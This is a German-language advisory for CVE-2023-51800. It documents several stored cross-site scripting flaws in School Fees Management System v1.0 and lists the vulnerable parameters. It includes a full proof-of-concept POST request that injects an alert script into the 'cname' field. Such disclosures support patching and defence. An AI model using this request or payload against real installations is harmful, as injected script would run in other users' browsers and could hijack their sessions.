
Mehrere Cross-Site-Scripting (XSS)-Sicherheitslücken im Schulgebührenverwaltungssystem v1.0.
Beschreibung: Mehrere Cross-Site-Scripting (XSS) Schwachstellen in School Fees Management System v1.0.
Verwundbare Produktversion: School Fees Management System v1.0
CVE-Autor: Geraldo Alcântara
Datum: 28.11.2023
Bestätigt am: 10.12.2023
CVE: CVE-2023-51800
CVE-Link: https://www.cve.org/CVERecord?id=CVE-2023-51800
NVD-Link: https://nvd.nist.gov/vuln/detail/CVE-2023-51800
Tenable-Link: https://www.tenable.com/cve/CVE-2023-51800
Getestet auf: Windows
Um die Schwachstelle auszunutzen, muss ein authentifizierter Benutzer mit den erforderlichen Berechtigungen zu einer der betroffenen Seiten navigieren und eine schädliche Nutzlast in eines der anfälligen Felder injizieren.
Betroffene Komponenten:
main_settings – Parameter phone, address, bank, acc_name, acc_number,
new_class – Parameter cname,
add_new_parent – Parameter name, email, new_term – Parameter tname, edit_student – Parameter name
Request:
POST /ci_fms/admin/action/new_class HTTP/1.1
Host: 192.168.68.148
Content-Length: 273
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.68.148
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAbJT9XS9eFLU53MR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.68.148/ci_fms/admin/management/class
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ci_session=gdoj5tr7rsf7ci5o9rpr0rh5eni2r6an
Connection: close
------WebKitFormBoundaryAbJT9XS9eFLU53MR
Content-Disposition: form-data; name="cname"
<script>alert(document.domain)</script>
------WebKitFormBoundaryAbJT9XS9eFLU53MR
Content-Disposition: form-data; name="cfees"
12,000
------WebKitFormBoundaryAbJT9XS9eFLU53MR--
Entdecker/Credits:
Geraldo Alcântara